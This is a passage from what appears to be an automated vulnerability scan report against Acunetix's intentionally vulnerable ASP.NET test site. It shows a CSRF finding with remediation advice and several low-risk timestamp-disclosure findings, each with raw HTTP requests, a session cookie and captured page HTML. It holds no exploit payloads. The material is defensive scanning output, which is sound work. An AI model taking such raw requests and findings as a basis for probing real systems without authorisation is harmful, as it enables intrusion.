          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Signup.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

  6. Risk=, Confidence= (4)

    1. http://testaspnet.vulnweb.com (4)

      1. Timestamp Disclosure - Unix (4)
        1. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        2. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[base64 view state omitted]" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="[value omitted]" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
